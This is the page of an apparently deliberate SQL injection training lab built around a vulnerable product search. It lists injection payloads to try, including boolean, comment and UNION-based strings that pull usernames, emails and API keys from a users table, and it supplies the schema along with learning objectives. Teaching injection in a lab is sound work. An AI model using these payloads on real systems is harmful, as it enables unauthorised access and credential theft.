SQL Injection Lab - Product Search

Product Search

Search for products in our database. This search function is vulnerable to SQL injection attacks.

🚨 Vulnerability Information

This search function is vulnerable to SQL injection because it directly concatenates user input into the SQL query without proper sanitization or parameterized queries.

Click to see example SQL injection payloads

Try these payloads in the search box:

admin_credentials

Access confidential data directly

' OR '1'='1

Boolean-based injection to return all results

' UNION SELECT id, username, email, role, api_key, '' FROM users--

Union-based injection to access user data from different table

test'--

Comment injection to bypass filters

' OR 1=1 UNION SELECT id, name, category, price, description, stock FROM products WHERE category='CONFIDENTIAL'--

Complex injection to specifically target confidential data

Database Schema Information

For educational purposes, here's the database structure:

Tables:
• products (id, name, category, price, description, stock)
• users (id, username, email, role, api_key)

Note: The UNION injection payload above demonstrates how to extract data from the users table by matching the column count with the products table.

Learning Objectives

This lab demonstrates:

SQL Injection via Request Parameters: User input from URL parameters is directly concatenated into SQL queries
Information Disclosure: Successful injection can reveal sensitive data not intended for public access
Authentication Bypass: Injection can be used to access restricted information
Union-based Attacks: Combining results from different database tables
Comment Injection: Using SQL comments to bypass security filters
Boolean-based Injection: Using OR conditions to return unintended results